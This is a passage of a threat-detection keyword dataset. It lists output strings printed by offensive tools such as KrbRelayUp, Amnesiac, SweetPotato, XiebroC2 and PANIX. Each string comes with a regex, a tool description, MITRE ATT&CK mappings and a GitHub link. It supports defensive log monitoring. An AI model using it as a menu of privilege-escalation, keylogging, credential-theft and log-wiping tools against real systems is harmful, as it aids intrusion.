error*",".{0,1000}\[\+\]\sRasman\sservice\sis\serror.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","#content","N/A","10","4","371","53","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z","13276" "*[+] Rasman service is running!*",".{0,1000}\[\+\]\sRasman\sservice\sis\srunning!.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","#content","N/A","10","4","371","53","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z","13277" "*[+] RDP Keylog saved to *",".{0,1000}\[\+\]\sRDP\sKeylog\ssaved\sto\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#content","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13278" "*[+] RDP Keylogger Loaded*",".{0,1000}\[\+\]\sRDP\sKeylogger\sLoaded.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#content","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13279" "*[+] RDP Keylogger started with PID *",".{0,1000}\[\+\]\sRDP\sKeylogger\sstarted\swith\sPID\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist 
with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#content","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13280" "*[+] Ready for Post-Exp :)*",".{0,1000}\[\+\]\sReady\sfor\sPost\-Exp\s\:\).{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","0","#content","N/A","10","7","671","91","2025-03-12T21:58:25Z","2023-07-24T13:59:16Z","13281" "*[+] Registry key set. 
DLL will be loaded on reboot*",".{0,1000}\[\+\]\sRegistry\skey\sset\.\sDLL\swill\sbe\sloaded\son\sreboot.{0,1000}","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","#content","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","13282" "*[+] Relaying seems successfull, check ntlmrelayx output!*",".{0,1000}\[\+\]\sRelaying\sseems\ssuccessfull,\scheck\sntlmrelayx\soutput!.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","#content","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","13283" "*[+] Remote Code Executed Successfully !*",".{0,1000}\[\+\]\sRemote\sCode\sExecuted\sSuccessfully\s!.{0,1000}","offensive_tool_keyword","Rust-for-Malware-Development","malware development using Rust","T1055.001 - T1027 - T1204 - T1518 - T1056 - T1021 - T1587.001","TA0005 - TA0003 - TA0007 - TA0009 - TA0004 - TA0008 - TA0042","N/A","N/A","Exploitation tool","https://github.com/Whitecat18/Rust-for-Malware-Development","1","0","#content","N/A","8","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","13284" "*[+] Remote COM secret : *",".{0,1000}\[\+\]\sRemote\sCOM\ssecret\s\:\s.{0,1000}","offensive_tool_keyword","PPLSystem","creates a livedump of the machine through NtDebugSystemControl to extract the COM secret and context, to then inject inside this process.","T1003.002","TA0006","N/A","N/A","Credential Access","https://github.com/Slowerzs/PPLSystem","1","0","#content","N/A","10","2","190","23","2024-05-29T18:33:35Z","2024-05-22T17:48:49Z","13285" "*[+] Removed 
malicious entry from pre-commit hook in *",".{0,1000}\[\+\]\sRemoved\smalicious\sentry\sfrom\spre\-commit\shook\sin\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","13286" "*[+] Removing scheduled task on disk artifact*",".{0,1000}\[\+\]\sRemoving\sscheduled\stask\son\sdisk\sartifact.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","#content","N/A","9","4","336","46","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z","13287" "*[+] RootKit loaded successfully!*",".{0,1000}\[\+\]\sRootKit\sloaded\ssuccessfully!.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","0","#content","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","13288" "*[+] Rubeus Loaded*",".{0,1000}\[\+\]\sRubeus\sLoaded.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black 
Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#content","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13289" "*[+] Run the spawn method for SYSTEM shell:*",".{0,1000}\[\+\]\sRun\sthe\sspawn\smethod\sfor\sSYSTEM\sshell\:.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","#content","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","13290" "*[+] RUNNING ALL KNOWN EXPLOITS*",".{0,1000}\[\+\]\sRUNNING\sALL\sKNOWN\sEXPLOITS.{0,1000}","offensive_tool_keyword","CoercedPotato","CoercedPotato From Patate (LOCAL/NETWORK SERVICE) to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 Windows 11 and Server 2022.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Prepouce/CoercedPotato","1","0","#content","N/A","10","4","366","66","2024-08-26T08:09:00Z","2023-09-11T19:04:29Z","13291" "*[+] running normal privesc*",".{0,1000}\[\+\]\srunning\snormal\sprivesc.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","#content #linux","CVE-2024-1086 POC","10","10","2357","314","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z","13292" "*[+] RX Injection address: *",".{0,1000}\[\+\]\sRX\sInjection\saddress\:\s.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. 
It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#content","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","13293" "*[+] S4U2proxy success!*",".{0,1000}\[\+\]\sS4U2proxy\ssuccess!.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","#content","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","13294" "*[+] S4U2proxy success!*",".{0,1000}\[\+\]\sS4U2proxy\ssuccess!.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","#content","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","13295" "*[+] S4U2self success!*",".{0,1000}\[\+\]\sS4U2self\ssuccess!.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","#content","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","13296" "*[+] S4U2self success!*",".{0,1000}\[\+\]\sS4U2self\ssuccess!.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - 
T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","#content","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","13297" "*[+] Safety checks passed. Implanting your DLL*",".{0,1000}\[\+\]\sSafety\schecks\spassed\.\sImplanting\syour\sDLL.{0,1000}","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","#content","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","13298" "*[+] Save encrypted shellcode to *",".{0,1000}\[\+\]\sSave\sencrypted\sshellcode\sto\s.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tool","https://github.com/nickvourd/Supernova","1","0","#content","N/A","10","9","829","151","2025-04-18T19:15:22Z","2023-08-08T11:30:34Z","13299" "*[+] Scanning computers list on SMB port *",".{0,1000}\[\+\]\sScanning\scomputers\slist\son\sSMB\sport\s.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. 
Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/ProcessusT/HEKATOMB","1","0","#content","N/A","10","6","510","59","2024-07-31T19:05:30Z","2022-09-09T15:07:15Z","13300" "*[+] security evtx file handle unlock succ*",".{0,1000}\[\+\]\ssecurity\sevtx\sfile\shandle\sunlock\ssucc.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","#content","N/A","10","6","599","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z","13301" "*[+] Seems like the creds are valid: * :: * on *",".{0,1000}\[\+\]\sSeems\slike\sthe\screds\sare\svalid\:\s.{0,1000}\s\:\:\s.{0,1000}\son\s.{0,1000}","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","0","#content","N/A","N/A","1","87","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z","13302" "*[+] SeImpersonatePrivilege enabled*",".{0,1000}\[\+\]\sSeImpersonatePrivilege\senabled.{0,1000}","offensive_tool_keyword","Nightmangle","Nightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","0","#content","N/A","10","10","156","19","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z","13303" "*[+] Sending S4U2proxy request to domain controller *",".{0,1000}\[\+\]\sSending\sS4U2proxy\srequest\sto\sdomain\scontroller\s.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - 
T1210","TA0004 - TA0003","N/A","Dispossessor - Black Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","#content","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","13304" "*[+] Sending S4U2proxy request via KDC proxy: *",".{0,1000}\[\+\]\sSending\sS4U2proxy\srequest\svia\sKDC\sproxy\:\s.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Black Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","#content","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","13305" "*[+] Sending S4U2proxy request via KDC proxy:*",".{0,1000}\[\+\]\sSending\sS4U2proxy\srequest\svia\sKDC\sproxy\:.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Black Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","#content","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","13306" "*[+] Sending S4U2self request to *",".{0,1000}\[\+\]\sSending\sS4U2self\srequest\sto\s.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Black Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","#content","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","13307" "*[+] Sending S4U2self request via KDC proxy:*",".{0,1000}\[\+\]\sSending\sS4U2self\srequest\svia\sKDC\sproxy\:.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege 
escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Black Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","#content","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","13308" "*[+] Server connected to our evil RPC pipe*",".{0,1000}\[\+\]\sServer\sconnected\sto\sour\sevil\sRPC\spipe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","SharpEfsPotato","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","13309" "*[+] Server connected to our evil RPC pipe*",".{0,1000}\[\+\]\sServer\sconnected\sto\sour\sevil\sRPC\spipe.{0,1000}","offensive_tool_keyword","SharpEfsPotato","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","SharpEfsPotato","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","13310" "*[+] Server connected to our evil RPC pipe*",".{0,1000}\[\+\]\sServer\sconnected\sto\sour\sevil\sRPC\spipe.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/CCob/SweetPotato","1","0","#content","N/A","10","10","1697","228","2024-09-04T17:09:30Z","2020-04-12T17:40:03Z","13311" "*[+] SeTcbPrivilege is enabled successfully*",".{0,1000}\[\+\]\sSeTcbPrivilege\sis\senabled\ssuccessfully.{0,1000}","offensive_tool_keyword","PrivFu","SeTcbPrivilege exploitation","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","#content","PrivFu\PowerOfTcb","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","13312" "*[+] ShadowSpray recovered *",".{0,1000}\[\+\]\sShadowSpray\srecovered\s.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1556.005 - T1098.001 - T1098","TA0006 - TA0008 - TA0004","N/A","Black Basta","Credential Access","https://github.com/Dec0ne/ShadowSpray","1","0","#content","N/A","10","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","13313" "*[+] SharpHide running as elevated user*",".{0,1000}\[\+\]\sSharpHide\srunning\sas\selevated\suser.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","0","#content","N/A","9","5","480","96","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z","13314" "*[+] SharpHide running as normal user*",".{0,1000}\[\+\]\sSharpHide\srunning\sas\snormal\suser.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","0","#content","N/A","9","5","480","96","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z","13315" "*[+] Shellcode Injected 
Successfully*",".{0,1000}\[\+\]\sShellcode\sInjected\sSuccessfully.{0,1000}","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","0","#content","N/A","10","10","541","124","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z","13316" "*[+] Shellcode injected, waiting 60s for the hook to be called*",".{0,1000}\[\+\]\sShellcode\sinjected,\swaiting\s60s\sfor\sthe\shook\sto\sbe\scalled.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","0","#content","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","13317" "*[+] Shoggoth engine is initiated!*",".{0,1000}\[\+\]\sShoggoth\sengine\sis\sinitiated!.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","#content","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","13318" "*[+] SID added to msDS-AllowedToActOnBehalfOfOtherIdentity*",".{0,1000}\[\+\]\sSID\sadded\sto\smsDS\-AllowedToActOnBehalfOfOtherIdentity.{0,1000}","offensive_tool_keyword","Cable","*.NET post-exploitation toolkit for Active Directory reconnaissance and exploitation*","T1087 - T1016 - T1059 - T1482 - T1078","TA0007 - TA0002 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/logangoins/Cable","1","0","#content","N/A","7","4","361","40","2025-04-09T01:12:47Z","2024-08-10T19:47:08Z","13319" "*[+] SID added to 
msDS-AllowedToActOnBehalfOfOtherIdentity*",".{0,1000}\[\+\]\sSID\sadded\sto\smsDS\-AllowedToActOnBehalfOfOtherIdentity.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","#content","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","13320" "*[+] SMB reflected DCOM authentication succeeded!*",".{0,1000}\[\+\]\sSMB\sreflected\sDCOM\sauthentication\ssucceeded!.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","#content","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","13321" "*[+] SMB reflected DCOM authentication succeeded!*",".{0,1000}\[\+\]\sSMB\sreflected\sDCOM\sauthentication\ssucceeded!.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. 
This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","#content","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","13322" "*[+] SMBRemoting and WMIRemoting Loaded*",".{0,1000}\[\+\]\sSMBRemoting\sand\sWMIRemoting\sLoaded.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#content","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13323" "*[+] Spawning root shell*",".{0,1000}\[\+\]\sSpawning\sroot\sshell.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","#content","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","13324" "*[+] Spawning SYSTEM shell*",".{0,1000}\[\+\]\sSpawning\sSYSTEM\sshell.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","0","#content","N/A","8","4","357","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z","13325" "*[+] SSH key persistence established!*",".{0,1000}\[\+\]\sSSH\skey\spersistence\sestablished!.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - 
T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","13326" "*[+] Starting Macro_Pack web server*",".{0,1000}\[\+\]\sStarting\sMacro_Pack\sweb\sserver.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#content","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","13327" "*[+] Starting Nameless Server*",".{0,1000}\[\+\]\sStarting\sNameless\sServer.{0,1000}","offensive_tool_keyword","NamelessC2","A C2 with all its components written in Rust","T1102 - T1573.001 - T1027 - T1219 - T1205","TA0011 - TA0003 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/trickster0/NamelessC2","1","0","#content","N/A","10","10","266","33","2024-09-26T21:21:20Z","2024-09-26T21:06:37Z","13328" "*[+] Starting pspy now*",".{0,1000}\[\+\]\sStarting\spspy\snow.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#content #linux","N/A","8","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","13329" "*[+] Starting share enumeration against * hosts*",".{0,1000}Starting\sshare\senumeration\sagainst\s.{0,1000}\shosts.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - 
Fog","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","0","#content","N/A","10","1","33","7","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z","13330" "*[+] Stole token from*",".{0,1000}\[\+\]\sStole\stoken\sfrom.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","#content","N/A","9","2","112","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z","13331" "*[+] Succesfuly wrote shellcode to victim. about to start the Mirroring*",".{0,1000}\[\+\]\sSuccesfuly\swrote\sshellcode\sto\svictim\.\sabout\sto\sstart\sthe\sMirroring.{0,1000}","offensive_tool_keyword","Dirty-Vanity","injection technique abusing windows fork API to evade EDRs","T1055 - T1562 - T1070 - T1027","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/Dirty-Vanity","1","0","#content","N/A","10","7","633","86","2022-12-23T10:54:10Z","2022-11-24T10:54:00Z","13332" "*[+] Success! Entering webshell*",".{0,1000}\[\+\]\sSuccess!\sEntering\swebshell.{0,1000}","offensive_tool_keyword","ProxyLogon","ProxyLogon exploitation","T1190 - T1210 - T1213 - T1003 - T1059.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","Dispossessor","Exploitation tool","https://github.com/hausec/ProxyLogon","1","0","#content","N/A","10","3","293","76","2024-07-02T10:00:00Z","2021-03-15T14:37:57Z","13333" "*[+] Success! 
